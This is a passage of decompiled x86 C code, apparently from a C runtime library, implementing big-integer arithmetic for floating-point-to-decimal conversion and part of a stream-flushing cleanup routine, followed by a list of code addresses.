													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1266 = _t1023 >> 5;
													_v1876 = _t1266;
													_v1908 = _t1129;
													_t1027 = E00B7F0C0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1182 = _t1266 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1182;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1182 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1182 - 0x00000073 > 0x00000000;
													__eflags = _t1182 - 0x73;
													if(_t1182 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00B8BDE1( &_v468, 0x1cc,  &_v1396, 0);
														_t1274 =  &(_t1274[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1182 - _t1134;
															if(_t1182 >= _t1134) {
																_t1182 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1182;
															_v1892 = _t1135;
															__eflags = _t1182 - 0xffffffff;
															if(_t1182 != 0xffffffff) {
																_t1183 = _v1876;
																_t1268 = _t1182 - _t1183;
																__eflags = _t1268;
																_t1043 =  &_v468 + _t1268 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1183;
																	if(_t1135 < _t1183) {
																		break;
																	}
																	__eflags = _t1268 - _t1061;
																	if(_t1268 >= _t1061) {
																		_t1230 = 0;
																		__eflags = 0;
																	} else {
																		_t1230 =  *_t1043;
																	}
																	__eflags = _t1268 - 1 - _t1061;
																	if(_t1268 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1271 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1230 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1268 = _t1268 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1182 = _v1880;
																_t1266 = _v1876;
															}
															__eflags = _t1266;
															if(_t1266 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1266 << 2);
																_t1274 =  &(_t1274[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1182;
															} else {
																_v472 = _t1182 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00B8BDE1();
										_t1277 =  &(_t1274[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xb983dc + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1199 = 0;
															_t1248 = 0;
															__eflags = 0;
															do {
																_t1153 = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) >> 0x20;
																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1248 = _t1248 + 1;
																_t1199 = _t1153;
																__eflags = _t1248 - _t1096;
															} while (_t1248 != _t1096);
															__eflags = _t1199;
															if(_t1199 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xb98346 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xb98346 + _t812 * 4) & 0x000000ff) + ( *(0xb98347 + _t812 * 4) & 0x000000ff);
												E00B7FFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00B80320( &(( &_v1396)[_t1097]), 0xb97a40 + ( *(0xb98344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xb98347 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1202 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1154 =  &_v468;
														} else {
															_t1202 =  &_v468;
															_t1154 =  &_v1396;
														}
														_v1908 = _t1154;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1155 = 0;
														_t1250 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1155;
															_t870 = _t1155 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1203 = _t1202 -  &_v1860;
															__eflags = _t1203;
															_v1928 = _t1203;
															do {
																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1204 = 0;
																	_t1099 = _t1250;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1203 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1155;
																			if(_t1099 == _t1155) {
																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1250;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1204 = _t886 * _v1896 >> 0x20;
																			_t1155 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1204;
																				if(_t1204 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1155;
																					if(_t1099 == _t1155) {
																						_t558 = _t1271 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1204;
																					_t1204 = 0;
																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
																					_t1155 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1250 - _t1155;
																	if(_t1250 == _t1155) {
																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
																		_t526 = _t1250 + 1; // 0x1
																		_t1155 = _t526;
																		_v1864 = _t1155;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1250 = _t1250 + 1;
																__eflags = _t1250 - _t1098;
															} while (_t1250 != _t1098);
															goto L243;
														}
													} else {
														_t1205 = _v468;
														_v472 = _t1098;
														E00B8BDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1205;
														if(_t1205 == 0) {
															goto L203;
														} else {
															__eflags = _t1205 - 1;
															if(_t1205 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1251 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1205;
																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1251 = _t1251 + 1;
																		_t1100 = _t1156;
																		__eflags = _t1251 - _v1896;
																	} while (_t1251 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1206 = _v1396;
													__eflags = _t1206;
													if(_t1206 != 0) {
														__eflags = _t1206 - 1;
														if(_t1206 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1252 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1206;
																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1252 = _t1252 + 1;
																	_t1101 = _t1157;
																	__eflags = _t1252 - _v1896;
																} while (_t1252 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00B8BDE1( &_v468, _t1064,  &_v2404, 0);
																		_t1277 =  &(_t1277[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00B8BDE1();
														_t1277 =  &(_t1277[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1207 =  *(0xb983dc + _t1102 * 4);
												__eflags = _t1207;
												if(_t1207 != 0) {
													__eflags = _t1207 - 1;
													if(_t1207 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1253 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1207;
																_t1161 = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1271 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) + _t1253;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1253 = _t1161;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1253;
															if(_t1253 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1271 + _t913 * 4 - 0x3a0) = _t1253;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xb98346 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xb98346 + _t908 * 4) & 0x000000ff) + ( *(0xb98347 + _t908 * 4) & 0x000000ff);
												E00B7FFF0(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E00B80320( &(( &_v1396)[_t1104]), 0xb97a40 + ( *(0xb98344 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xb98347 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1277 =  &(_t1277[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1210 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1162 =  &_v932;
														} else {
															_t1210 =  &_v932;
															_t1162 =  &_v1396;
														}
														_v1876 = _t1162;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1163 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1163;
															_t929 = _t1163 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1211 = _t1210 -  &_v1860;
															__eflags = _t1211;
															_v1928 = _t1211;
															do {
																_t937 =  *(_t1271 + _t1211 + _t1255 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1212 = 0;
																	_t1106 = _t1255;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1211 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1163;
																			if(_t1106 == _t1163) {
																				 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1255;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1212;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1212 = _t945 * _v1884 >> 0x20;
																			_t1163 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1212;
																				if(_t1212 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1163;
																					if(_t1106 == _t1163) {
																						_t370 = _t1271 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1212;
																					_t1212 = 0;
																					 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t943;
																					_t1163 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1255 - _t1163;
																	if(_t1255 == _t1163) {
																		 *(_t1271 + _t1255 * 4 - 0x740) =  *(_t1271 + _t1255 * 4 - 0x740) & _t937;
																		_t338 = _t1255 + 1; // 0x1
																		_t1163 = _t338;
																		_v1864 = _t1163;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1105;
															} while (_t1255 != _t1105);
															goto L177;
														}
													} else {
														_t1213 = _v932;
														_v936 = _t1105;
														E00B8BDE1( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1277 =  &(_t1277[4]);
														__eflags = _t1213;
														if(_t1213 != 0) {
															__eflags = _t1213 - 1;
															if(_t1213 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1213;
																		_t1164 = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) >> 0x20;
																		 *(_t1271 + _t1256 * 4 - 0x3a0) = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1107 = _t1164;
																		__eflags = _t1256 - _v1884;
																	} while (_t1256 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1214 = _v1396;
													__eflags = _t1214;
													if(_t1214 != 0) {
														__eflags = _t1214 - 1;
														if(_t1214 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1214;
																	_t1165 = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) >> 0x20;
																	 *(_t1271 + _t1257 * 4 - 0x3a0) = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1108 = _t1165;
																	__eflags = _t1257 - _v1884;
																} while (_t1257 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1271 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00B8BDE1();
																		_t1277 =  &(_t1277[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00B8BDE1();
														_t1277 =  &(_t1277[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00B8BDE1();
													_t1277 =  &(_t1277[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1194 = _v1920;
									_t1243 = _t1194;
									_t1086 = _v472;
									_v1872 = _t1243;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1247 = 0;
										_t1198 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1271 + _t1198 * 4 - 0x1d0);
											_t1151 = 0xa;
											_t1152 = _t841 * _t1151 >> 0x20;
											 *(_t1271 + _t1198 * 4 - 0x1d0) = _t841 * _t1151 + _t1247;
											asm("adc edx, 0x0");
											_t1198 = _t1198 + 1;
											_t1247 = _t1152;
											__eflags = _t1198 - _t1086;
										} while (_t1198 != _t1086);
										_v1896 = _t1247;
										__eflags = _t1247;
										_t1243 = _v1872;
										if(_t1247 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00B8BDE1( &_v468, _t1064,  &_v2404, 0);
												_t1277 =  &(_t1277[4]);
											} else {
												 *(_t1271 + _t1095 * 4 - 0x1d0) = _t1152;
												_v472 = _v472 + 1;
											}
										}
										_t1194 = _t1243;
									}
									_t815 = E00B8D440( &_v472,  &_v936);
									_t1142 = 0xa;
									__eflags = _t815 - _t1142;
									if(_t815 != _t1142) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1243 = _t1194 + 1;
											 *_t1194 = _t816;
											_v1872 = _t1243;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1243 = _t1194 + 1;
										_t832 = _v936;
										 *_t1194 = 0x31;
										_v1872 = _t1243;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1197 = 0;
											_t1246 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1271 + _t1094 * 4 - 0x3a0);
												 *(_t1271 + _t1094 * 4 - 0x3a0) = _t833 * _t1142 + _t1197;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1197 = _t833 * _t1142 >> 0x20;
												_t1142 = 0xa;
												__eflags = _t1094 - _t1246;
											} while (_t1094 != _t1246);
											_t1243 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00B8BDE1( &_v932, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t836 * 4 - 0x3a0) = _t1197;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1243 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1195 = 0;
											_t1244 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1271 + _t1090 * 4 - 0x1d0);
												 *(_t1271 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1195;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1195 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1244;
											} while (_t1090 != _t1244);
											_t1245 = _v1872;
											__eflags = _t1195;
											if(_t1195 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00B8BDE1( &_v468, _t1064,  &_v2404, 0);
													_t1277 =  &(_t1277[4]);
												} else {
													 *(_t1271 + _t826 * 4 - 0x1d0) = _t1195;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E00B8D440( &_v472,  &_v936);
											_t1196 = 8;
											_t1070 = _v1916 - _t1245;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1142 = _t708 + 0x30;
												__eflags = _t1070 - _t1196;
												if(_t1070 >= _t1196) {
													 *(_t1196 + _t1245) = _t1142;
												}
												_t1196 = _t1196 - 1;
												__eflags = _t1196 - 0xffffffff;
											} while (_t1196 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1243 = _t1245 + _t1070;
											_v1872 = _t1243;
											__eflags = _t1243 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1243 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1234 & 0x000fffff;
					if((_t1186 | _t1234 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xb98404);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E00B88D67() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00B89097();
							asm("int3");
							_push(0x10);
							E00B7F5F0(_t1055, _t1186, _t1234);
							_v32 = _v32 & 0x00000000;
							E00B8AC31(8);
							_t1071 = 0xb9c4e8;
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1235 = 3;
							while(1) {
								_v36 = _t1235;
								__eflags = _t1235 -  *0xbc2274; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xbc2278; // 0x0
								_t764 =  *(_t763 + _t1235 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xbc2278; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1235 * 4)));
										_t774 = E00B90023(_t1055, _t1071, _t1142, _t1186, _t1235, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0xbc2278; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1235 * 4)) + 0x20);
									_t770 =  *0xbc2278; // 0x0
									E00B88DCC( *((intOrPtr*)(_t770 + _t1235 * 4)));
									_pop(_t1071);
									_t772 =  *0xbc2278; // 0x0
									_t737 = _t772 + _t1235 * 4;
									 *_t737 =  *(_t772 + _t1235 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1235 = _t1235 + 1;
							}
							_v8 = 0xfffffffe;
							E00B8ED21();
							return E00B7F640(_v32);
						} else {
							L309:
							_t1284 = _v1936;
							_pop(_t1187);
							_pop(_t1236);
							_pop(_t1056);
							if(_v1936 != 0) {
								_t755 = E00B8F381(_t1070, _t1284,  &_v1944);
							}
							return E00B7FBBC(_t755, _t1056, _v8 ^ _t1271, _t1142, _t1187, _t1236);
						}
					}
				}
			}

0x00b8d8ee
0x00b8d8f1
0x00b8d8f3
0x00b8d8f9
0x00b8d900
0x00b8d903
0x00b8d904
0x00b8d90d
0x00b8d90e
0x00b8d90f
0x00b8d912
0x00b8d918
0x00b8d91e
0x00b8d923
0x00b8d932
0x00b8d934
0x00b8d936
0x00b8d936
0x00b8d93d
0x00b8d947
0x00b8d94c
0x00b8d94f
0x00b8d973
0x00b8d977
0x00b8d97c
0x00b8d97d
0x00b8d97f
0x00b8d981
0x00b8d987
0x00b8d987
0x00b8d98e
0x00b8d98e
0x00b8d991
0x00b8ec41
0x00000000
0x00b8d997
0x00b8d997
0x00b8d997
